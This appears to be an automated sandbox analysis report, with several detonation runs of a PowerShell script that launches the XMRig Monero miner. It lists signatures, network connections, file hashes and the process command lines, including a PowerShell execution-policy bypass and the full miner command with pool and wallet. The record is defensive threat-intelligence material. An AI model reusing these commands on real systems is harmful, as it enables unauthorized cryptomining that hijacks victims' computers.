| PID 4864 wrote to memory of 1804 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4864 wrote to memory of 1804 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 52.111.227.14:443 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lt4iqyml.soa.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240419-en
Max time kernel
297s
Max time network
295s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3000 wrote to memory of 468 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3000 wrote to memory of 468 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ottjnsdz.0mh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral32
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240419-en
Max time kernel
294s
Max time network
295s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1216 wrote to memory of 2108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1216 wrote to memory of 2108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1uk0xzbp.1h3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240226-en
Max time kernel
295s
Max time network
306s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4244 wrote to memory of 2480 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4244 wrote to memory of 2480 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2392 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v1wbs2mj.bkn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240226-en
Max time kernel
299s
Max time network
295s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4840 wrote to memory of 548 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4840 wrote to memory of 548 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1408 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| GB | 142.250.187.234:443 | | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.150.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ym2rnfq1.yz5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral31
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
300s
Max time network
249s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3356 wrote to memory of 4884 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3356 wrote to memory of 4884 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.42.73.24:443 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qic2erg2.34c.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
293s
Max time network
296s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
